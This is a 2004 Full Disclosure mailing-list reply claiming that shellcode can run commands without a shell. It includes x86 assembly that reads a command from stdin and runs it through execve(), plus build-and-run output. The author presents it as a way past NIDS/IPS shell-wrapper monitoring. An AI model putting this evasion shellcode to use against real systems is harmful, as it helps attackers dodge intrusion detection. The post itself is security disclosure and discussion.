Full Disclosure mailing list archives
Re: No shell => secure?
From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 9 Jul 2004 16:01:46 -0300 (ART)
Hello Srs.! We don't need a shell. One shellcode use system calls and the shellcode can be the shell. See the follow code: -------------- noshell.s -------------- #Exemplo de assembly que simula shell. #Sem utilizar nenhuma shell, ele é a shell.:) #Nash Leon - nashleon () yahoo com br # #Obs: tah pegando apenas filename com 7 bytes. _start: #read(0,buffer,20) xorl %ebx, %ebx movl $3, %eax leal -20(%esp),%ecx movl $20, %edx int $0x80 #execve(buffer) pushl %ecx popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax movl %esi,%ebx leal 0x8(%esi),%ecx #leal 0xc(%esi),%edx movl $0x0, %edx int $0x80 #exit() movl $0x1, %eax xorl %ebx, %ebx int $0x80 --------------------------------------- This source use read() and execve() to execute one command from stdin. This sample is only to demonstrate that is possible create one shellcode that execute commands without use one shell(/bin/bash,sh,zsh,tcsh, etc). It is util when one NIDS/IPS interact with one shell wrapper, waiting one string in the interface, capturing an attack. In this sample is permitted only 7 bytes as path filename to execute: $ as -o noshell.o noshell.s $ ld -o noshell noshell.s ld: warning: cannot find entry symbol _start; defaulting to 0000000008048074 $ /noshell /bin/ls noshell noshell.o noshell.s So, Mrs. One shell is not necessary to exploit one system. NIDs/IPS can use wrapper in the system call execve() to security, but still is possible break this resource. Sorry ny poor english. Best Regard, Martin Fallon. Clube dos Mercenarios http://cdm.frontthescene.com.br/ _______________________________________________________ Yahoo! Mail agora com 100MB, anti-spam e antivírus grátis! http://br.info.mail.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: No shell => secure?, (continued)
- Re: No shell => secure? Valdis . Kletnieks (Jul 09)
- Re: No shell => secure? Matthias Benkmann (Jul 09)
- Re: No shell => secure? Valdis . Kletnieks (Jul 09)
- Re: No shell => secure? hax (Jul 09)
- Re: No shell => secure? st3ng4h (Jul 09)
- Re: No shell => secure? hax (Jul 09)
- Re: No shell => secure? Matthias Benkmann (Jul 09)
- Re: No shell => secure? Kurt Seifried (Jul 09)
- Re: No shell => secure? Seth Alan Woolley (Jul 12)
- Re: No shell => secure? Wall, Kevin (Jul 09)
- Re: No shell => secure? Martin Fallon (Jul 09)
- RE: No shell => secure? Deckard, Jason (Jul 09)
- Re: No shell => secure? John Creegan (Jul 12)